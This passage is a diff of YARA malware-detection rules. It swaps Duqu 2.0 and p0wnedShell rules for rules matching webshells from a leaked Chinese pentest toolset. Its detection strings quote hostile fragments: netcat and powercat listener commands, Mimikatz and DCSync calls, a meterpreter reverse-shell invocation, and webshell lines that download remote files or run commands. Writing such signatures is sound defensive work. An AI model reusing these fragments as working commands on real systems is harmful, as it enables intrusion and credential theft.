+		logic_hash = "0f3a4f81326154a6a6ac448d18be29ad534917bc39aba26cc458f06b43001681"
+		score = 70
+		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
+		hash1 = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
+		hash2 = "f80ec26bbdc803786925e8e0450ad7146b2478ff"
+		hash3 = "e83d427f44783088a84e9c231c6816c214434526"
 
 	strings:
-		$a1 = "{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
-		$a2 = "\\\\.\\pipe\\{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
-		$a4 = "\\\\.\\pipe\\{AB6172ED-8105-4996-9D2A-597B5F827501}" wide
-		$a5 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" wide
-		$a8 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" wide
-		$a9 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" wide
-		$a7 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" wide
-		$b1 = "MSI.dll"
-		$b2 = "msi.dll"
-		$b3 = "StartAction"
-		$c1 = "msisvc_32@" wide
-		$c2 = "PROP=" wide
-		$c3 = "-Embedding" wide
-		$c4 = "S:(ML;;NW;;;LW)" wide
-		$d1 = "NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer" nocase
-		$d2 = {2E 3F 41 56 3F 24 5F 42 69 6E 64 40 24 30 30 58 55 3F 24 5F 50 6D 66 5F 77 72 61 70 40 50 38 43 4C 52 ?? 40 40 41 45 58 58 5A 58 56 31 40 24 24 24 56 40 73 74 64 40 40 51 41 56 43 4C 52 ?? 40 40 40 73 74 64 40 40}
+		$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
+		$s2 = "strReturn=Replace(strReturn,chr(43),\"%2B\")  'JMDCW" fullword ascii
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) ) and filesize < 100000 ) or ( ( uint32( 0 ) == 0xe011cfd0 ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) or ( any of ( $d* ) ) ) and filesize < 20000000 )
+		filesize < 7342KB and all of them
 }
-rule SIGNATURE_BASE_APT_Apt_Duqu2_Drivers : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Cmfshell : FILE
 {
 	meta:
-		description = "Rule to detect Duqu 2.0 drivers"
-		author = "Kaspersky Lab"
-		id = "714d5151-9f80-582e-a628-1de9d83a072d"
-		date = "2015-06-09"
+		description = "Webshell from CN Honker Pentest Toolset - file cmfshell.cmf"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c5670deb-952c-5ba4-949a-097cc09bb108"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L40-L57"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L944-L959"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "023a51408f86814a8f810d0f89b185aca07dd60a1abb6de47f86ad8eeda4c4c4"
-		score = 75
+		hash = "b9b2107c946431e4ad1a8f5e53ac05e132935c0e"
+		logic_hash = "f138a82c2d6a831626fe200308eb89cb50ffeec2f2722599eb4ccbd082bad73d"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "\\DosDevices\\port_optimizer" wide nocase
-		$a2 = "romanian.antihacker"
-		$a3 = "PortOptimizerTermSrv" wide
-		$a4 = "ugly.gorilla1"
-		$b1 = "NdisIMCopySendCompletePerPacketInfo"
-		$b2 = "NdisReEnumerateProtocolBindings"
-		$b3 = "NdisOpenProtocolConfiguration"
+		$s1 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
+		$s2 = "<form action=\"<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>\" method=\"post\">" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( 2 of ( $b* ) ) and filesize < 100000
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_Duqu2_Generic1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php4 : FILE
 {
 	meta:
-		description = "Kaspersky APT Report - Duqu2 Sample - Generic Rule"
+		description = "Webshell from CN Honker Pentest Toolset - file php4.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0e03eda5-d65b-5400-aceb-bc37559d9a6e"
-		date = "2015-06-10"
+		id = "82446dff-dd1e-54a8-bb70-570bedc805b5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/7yKyOj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L61-L90"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L961-L975"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "742934198391bd30da654bf8efedc2a18c58dd0de357b2bcdbdbe8066187b0c2"
-		score = 75
+		hash = "179975f632baff6ee4d674fe3fabc324724fee9e"
+		logic_hash = "e625b6d1fd2c1e62306ccae2775ee7b53ddcdd7a6baef55b386dfcd92dc2e764"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3f9168facb13429105a749d35569d1e91465d313"
-		hash1 = "0a574234615fb2382d85cd6d1a250d6c437afecc"
-		hash2 = "38447ed1d5e3454fe17699f86c0039f30cc64cde"
-		hash3 = "5282d073ee1b3f6ce32222ccc2f6066e2ca9c172"
-		hash4 = "edfca3f0196788f7fde22bd92a8817a957c10c52"
-		hash5 = "6a4ffa6ca4d6fde8a30b6c8739785f4bd2b5c415"
-		hash6 = "00170bf9983e70e8dd4f7afe3a92ce1d12664467"
-		hash7 = "32f8689fd18c723339414618817edec6239b18f3"
-		hash8 = "f860acec9920bc009a1ad5991f3d5871c2613672"
-		hash9 = "413ba509e41c526373f991d1244bc7c7637d3e13"
-		hash10 = "29cd99a9b6d11a09615b3f9ef63f1f3cffe7ead8"
-		hash11 = "dfe1cb775719b529138e054e7246717304db00b1"
 
 	strings:
-		$s0 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" fullword wide
-		$s1 = "SetSecurityDescriptorSacl" fullword ascii
-		$s2 = "msisvc_32@" fullword wide
-		$s3 = "CompareStringA" fullword ascii
-		$s4 = "GetCommandLineW" fullword ascii
+		$s0 = "nc -l -vv -p port(" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		uint16( 0 ) == 0x4850 and filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Procexp : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Linux_2_6_Exploit : FILE
 {
 	meta:
-		description = "Kaspersky APT Report - Duqu2 Sample - Malicious MSI"
+		description = "Webshell from CN Honker Pentest Toolset - file 2.6.9"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d7fd48d5-2416-5eff-a751-ece09ce27767"
-		date = "2015-06-10"
+		id = "22e2aca7-418f-598f-af0c-99942aaf3278"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/7yKyOj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L92-L114"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L977-L991"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd63f0eebc88fa0737905f20dc30dc968df81b7976a86ed8ed5646f7708c4b4a"
-		score = 75
+		hash = "ec22fac0510d0dc2c29d56c55ff7135239b0aeee"
+		logic_hash = "7f3e2937796358a949ce980210ddeb1a606a7b9c2b4d9c4a4acad49bb556dfc8"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2422835716066b6bcecb045ddd4f1fbc9486667a"
-		hash2 = "b120620b5d82b05fee2c2153ceaf305807fa9f79"
-		hash3 = "288ebfe21a71f83b5575dfcc92242579fb13910d"
 
 	strings:
-		$x1 = "svcmsi_32.dll" fullword wide
-		$x2 = "msi3_32.dll" fullword wide
-		$x3 = "msi4_32.dll" fullword wide
-		$x4 = "MSI.dll" fullword ascii
-		$s1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide
-		$s2 = "Sysinternals installer" fullword wide
-		$s3 = "Process Explorer" fullword wide
+		$s0 = "[+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) ) and ( all of ( $s* ) )
+		filesize < 56KB and all of them
 }
-rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Samsungprint : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp2 : FILE
 {
 	meta:
-		description = "Kaspersky APT Report - Duqu2 Sample"
+		description = "Webshell from CN Honker Pentest Toolset - file asp2.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc4bc00e-f38b-577f-8f00-637c0549894c"
-		date = "2015-06-10"
+		id = "e5296405-c345-55dc-acd9-be6aca86c60b"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/7yKyOj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L116-L134"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L993-L1009"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ce39f41eb4506805efca7993d3b0b506ab6776ca"
-		logic_hash = "9b2d80cfe3c47ac315b76c773acc3290668e06e4bbd99402e203b72af593fab8"
-		score = 75
+		hash = "b3ac478e72a0457798a3532f6799adeaf4a7fc87"
+		logic_hash = "6107afe9895c4e0c865e78bece160246815a0d3c589bfc79f8b369b94481cd89"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Installer for printer drivers and applications" fullword wide
-		$s1 = "msi4_32.dll" fullword wide
-		$s2 = "HASHVAL" fullword wide
-		$s3 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide
-		$s4 = "ca.dll" fullword ascii
-		$s5 = "Samsung Electronics Co., Ltd." fullword wide
+		$s1 = "<%=server.mappath(request.servervariables(\"script_name\"))%>" fullword ascii
+		$s2 = "webshell</font> <font color=#00FF00>" fullword ascii
+		$s3 = "Userpwd = \"admin\"   'User Password" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 82KB and all of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Msi3_32 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_FTP_MYSQL_MSSQL_SSH : FILE
 {
 	meta:
-		description = "Kaspersky APT Report - Duqu2 Sample"
+		description = "Webshell from CN Honker Pentest Toolset - file FTP MYSQL MSSQL SSH.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6cbea2e7-f406-57cf-b9c8-9d84b1480035"
-		date = "2015-06-10"
+		id = "dd619901-6f0e-527e-9926-808176641c09"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/7yKyOj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L136-L157"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1011-L1029"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "53d9ef9e0267f10cc10f78331a9e491b3211046b"
-		logic_hash = "718223d1ff82ffa0f3204e0cdaf0d441ed133f1f069d9ba2eb818bd3445f63ca"
-		score = 75
+		hash = "fe63b215473584564ef2e08651c77f764999e8ac"
+		logic_hash = "a66884c71ce0cce05ba6607bf66dc55bfae5393746328c06f5c9ca98005d0caf"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "ProcessUserAccounts" fullword ascii
-		$s1 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide
-		$s2 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide
-		$s3 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide
-		$s4 = "msi3_32.dll" fullword wide
-		$s5 = "RunDLL" fullword ascii
-		$s6 = "MSI Custom Action v3" fullword wide
-		$s7 = "msi3_32" fullword wide
-		$s8 = "Operating System" fullword wide
+		$s1 = "$_SESSION['hostlist'] = $hostlist = $_POST['hostlist'];" fullword ascii
+		$s2 = "Codz by <a href=\"http://www.sablog.net/blog\">4ngel</a><br />" fullword ascii
+		$s3 = "if ($conn_id = @ftp_connect($host, $ftpport)) {" fullword ascii
+		$s4 = "$_SESSION['sshport'] = $mssqlport = $_POST['sshport'];" fullword ascii
+		$s5 = "<title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel</title>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 72KB and all of them
+		filesize < 20KB and 3 of them
 }
-rule SIGNATURE_BASE_P0Wnedpowercat : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Shell : FILE
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs"
+		description = "Webshell from CN Honker Pentest Toolset - file shell.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "059a8e58-7b7e-582e-ba4a-80e4dffe9b5e"
-		date = "2017-01-14"
+		id = "fdfc3fc1-9400-533b-978b-1a1fac112e1f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L10-L29"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1031-L1047"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5882d0f91f237d2abe1149421db0e217e6dfcca70130d346a70d5c851eca085f"
-		score = 75
+		hash = "b7b34215c2293ace70fc06cbb9ce73743e867289"
+		logic_hash = "be3961d6568acfaadfa09efda2f914259a59f4e30725c7d434e89f6020e40515"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6a3ba991d3b5d127c4325bc194b3241dde5b3a5853b78b4df1bce7cbe87c0fdf"
 
 	strings:
-		$x1 = "Now if we point Firefox to http://127.0.0.1" fullword ascii
-		$x2 = "powercat -l -v -p" fullword ascii
-		$x3 = "P0wnedListener" fullword ascii
-		$x4 = "EncodedPayload.bat" fullword ascii
-		$x5 = "powercat -c " fullword ascii
-		$x6 = "Program.P0wnedPath()" ascii
-		$x7 = "Invoke-PowerShellTcpOneLine" fullword ascii
+		$s1 = "xPost.Open \"GET\",\"http://www.i0day.com/1.txt\",False //" fullword ascii
+		$s2 = "sGet.SaveToFile Server.MapPath(\"test.asp\"),2 //" fullword ascii
+		$s3 = "http://hi.baidu.com/xahacker/fuck.txt" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7375 and filesize < 150KB and 1 of them ) or ( 2 of them )
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Hacktool_Strings_P0Wnedshell : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php7 : FILE
 {
 	meta:
-		description = "Detects strings found in Runspace Post Exploitation Toolkit"
-		author = "Florian Roth"
-		id = "0846039d-1e00-5224-9560-55ab18034d54"
-		date = "2017-01-14"
-		modified = "2023-02-10"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L31-L62"
+		description = "Webshell from CN Honker Pentest Toolset - file php7.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f21bb0db-d18a-58c0-a227-5baf5536c57b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1049-L1064"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "faec8f0af877f1a80ff994e08c756728cea5f58000f7124c1a6e7e4c86e7f5c0"
-		score = 75
+		hash = "05a3f93dbb6c3705fd5151b6ffb64b53bc555575"
+		logic_hash = "70804d914c6f31422632943bf663f997eb747a290a13b27bfcc66bc3129f136d"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
-		nodeepdive = 1
 
 	strings:
-		$x1 = "Invoke-TokenManipulation" fullword ascii
-		$x2 = "windows/meterpreter" fullword ascii
-		$x3 = "lsadump::dcsync" fullword ascii
-		$x4 = "p0wnedShellx86" fullword ascii
-		$x5 = "p0wnedShellx64" fullword ascii
-		$x6 = "Invoke_PsExec()" fullword ascii
-		$x7 = "Invoke-Mimikatz" fullword ascii
-		$x8 = "Invoke_Shellcode()" fullword ascii
-		$x9 = "Invoke-ReflectivePEInjection" ascii
-		$fp1 = "Sentinel Labs, Inc." wide
-		$fp2 = "Copyright Elasticsearch B.V." ascii wide
-		$fp3 = "Attack Information: Invoke-Mimikatz" ascii
-		$fp4 = "a30226 || INDICATOR-SHELLCODE Metasploit windows/meterpreter stage transfer attempt"
-		$fp5 = "use strict"
+		$s0 = "---> '.$ports[$i].'<br>'; ob_flush(); flush(); } } echo '</div>'; return true; }" ascii
+		$s1 = "$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : ''; $getaction = iss" ascii
 
 	condition:
-		filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* )
+		filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_P0Wnedpotato
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Rootkit : FILE
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs"
+		description = "Webshell from CN Honker Pentest Toolset - file rootkit.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2c2378e3-b948-5325-9afd-76424a7130b1"
-		date = "2017-01-14"
+		id = "ab51abca-0790-541c-9f18-1568809ef113"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L64-L81"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1066-L1081"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d9107db6c6460429358a2f9f1f47d103e96811152e8d03517871ff0c66578d05"
-		score = 75
+		hash = "3bfc1c95782e702cf56184e7d438edcf5802eab3"
+		logic_hash = "5569a179f011ece9802676542d5556fe8d2a2b144e26065b9e0c5bd06c970201"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aff2b694a01b48ef96c82daf387b25845abbe01073b76316f1aab3142fdb235b"
 
 	strings:
-		$x1 = "Invoke-Tater" fullword ascii
-		$x2 = "P0wnedListener.Execute(WPAD_Proxy);" fullword ascii
-		$x3 = " -SpooferIP " ascii
-		$x4 = "TaterCommand()" ascii
-		$x5 = "FileName = \"cmd.exe\"," fullword ascii
+		$s0 = "set ss=zsckm.get(\"Win32_ProcessSta\"&uyy&\"rtup\")" fullword ascii
+		$s1 = "If jzgm=\"\"Then jzgm=\"cmd.exe /c net user\"" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 80KB and all of them
 }
-rule SIGNATURE_BASE_P0Wnedexploits
+rule SIGNATURE_BASE_CN_Honker_Webshell_Jspshell : FILE
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs"
+		description = "Webshell from CN Honker Pentest Toolset - file jspshell.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f754f5f-85e8-5b6f-bde2-566da4d39586"
-		date = "2017-01-14"
+		id = "ff72f94b-1c0a-5615-b35f-35f69c920292"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L83-L97"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1083-L1098"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "40f23316117faa63fa9e9a5d281600f8e9d41857aac815d22559391c74dec157"
-		score = 75
+		hash = "d16af622f7688d4e0856a2678c4064d3d120e14b"
+		logic_hash = "9b952f941eb87d7a1b4f747f4e0b0b5ee8876190c6f684b811057a2c78044047"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "54548e7848e742566f5596d8f02eca1fd2cbfeae88648b01efb7bab014b9301b"
 
 	strings:
-		$x1 = "Pshell.RunPSCommand(Whoami);" fullword ascii
-		$x2 = "If succeeded this exploit should popup a System CMD Shell" fullword ascii
+		$s1 = "else if(Z.equals(\"M\")){String[] c={z1.substring(2),z1.substring(0,2),z2};Proce" ascii
+		$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
 
 	condition:
-		all of them
+		filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_P0Wnedshellx64
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Serv_U : FILE
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShellx64.exe"
+		description = "Webshell from CN Honker Pentest Toolset - file serv-u.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c9791804-4f08-5b7e-8d9d-37e2dfccec47"
-		date = "2017-01-14"
-		modified = "2021-09-15"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L99-L118"
+		id = "dd37b2c3-e06d-5245-97d7-40e5eeadb76f"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1100-L1117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d7cd33548ed3485cc6f3cd289813a8eb83b34e800b839c5c8f8add5f9e01a3da"
-		score = 75
+		hash = "1c6415a247c08a63e3359b06575b36017befc0c0"
+		logic_hash = "89cfcbaa38c3b0b6c31af634b4588dcc8bc7a5aa3edac955a162173341d03622"
+		score = 70
 		quality = 85
-		tags = ""
-		hash1 = "d8b4f5440627cf70fa0e0e19e0359b59e671885f8c1855517211ba331f48c449"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9Pjgb/+kPPhv9Sjp01Wf" wide
-		$x2 = "Invoke-TokenManipulation" wide
-		$x3 = "-CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"" fullword wide
-		$x4 = "CommandShell with Local Administrator privileges :)" fullword wide
-		$x5 = "Invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost " fullword wide
-		$fp1 = "AVSignature" ascii wide
+		$s1 = "@readfile(\"c:\\\\winnt\\\\system32\\" ascii
+		$s2 = "$sendbuf = \"PASS \".$_POST[\"password\"].\"\\r\\n\";" fullword ascii
+		$s3 = "$cmd=\"cmd /c rundll32.exe $path,install $openPort $activeStr\";" fullword ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of them
+		filesize < 435KB and all of them
 }
-rule SIGNATURE_BASE_P0Wnedlistenerconsole
+rule SIGNATURE_BASE_CN_Honker_Webshell_Webshell : FILE
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedListenerConsole.cs"
+		description = "Webshell from CN Honker Pentest Toolset - file WebShell.cgi"
 		author = "Florian Roth (Nextron Systems)"
-		id = "77d13c34-3e15-5bc1-a100-f04be38cfb44"
-		date = "2017-01-14"
+		id = "9fe4c8fd-3955-5405-add2-835e6f64e8f2"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L120-L140"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1119-L1135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "068e590f6f4f99c27814f2bf96d51e1c8c6422afcf8b99bb9f1852216335da7b"
-		score = 75
+		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
+		logic_hash = "7d80390a86b1858d2cf4f2be56df7e734aea402de0878adf40ef36721719ca74"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d2d84e65fad966a8556696fdaab5dc8110fc058c9e9caa7ea78aa00921ae3169"
 
 	strings:
-		$x1 = "Invoke_ReflectivePEInjection" fullword wide
-		$x5 = "p0wnedShell> " fullword wide
-		$x6 = "Resources.Get_PassHashes" fullword wide
-		$s7 = "Invoke_CredentialsPhish" fullword wide
-		$s8 = "Invoke_Shellcode" fullword wide
-		$s9 = "Resources.Invoke_TokenManipulation" fullword wide
-		$s10 = "Resources.Port_Scan" fullword wide
-		$s20 = "Invoke_PowerUp" fullword wide
+		$s1 = "$login = crypt($WebShell::Configuration::password, $salt);" fullword ascii
+		$s2 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword ascii
+		$s3 = "warn \"command: '$command'\\n\";" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 30KB and 2 of them
 }
-rule SIGNATURE_BASE_P0Wnedbinaries
+rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Mssql_2 : FILE
 {
 	meta:
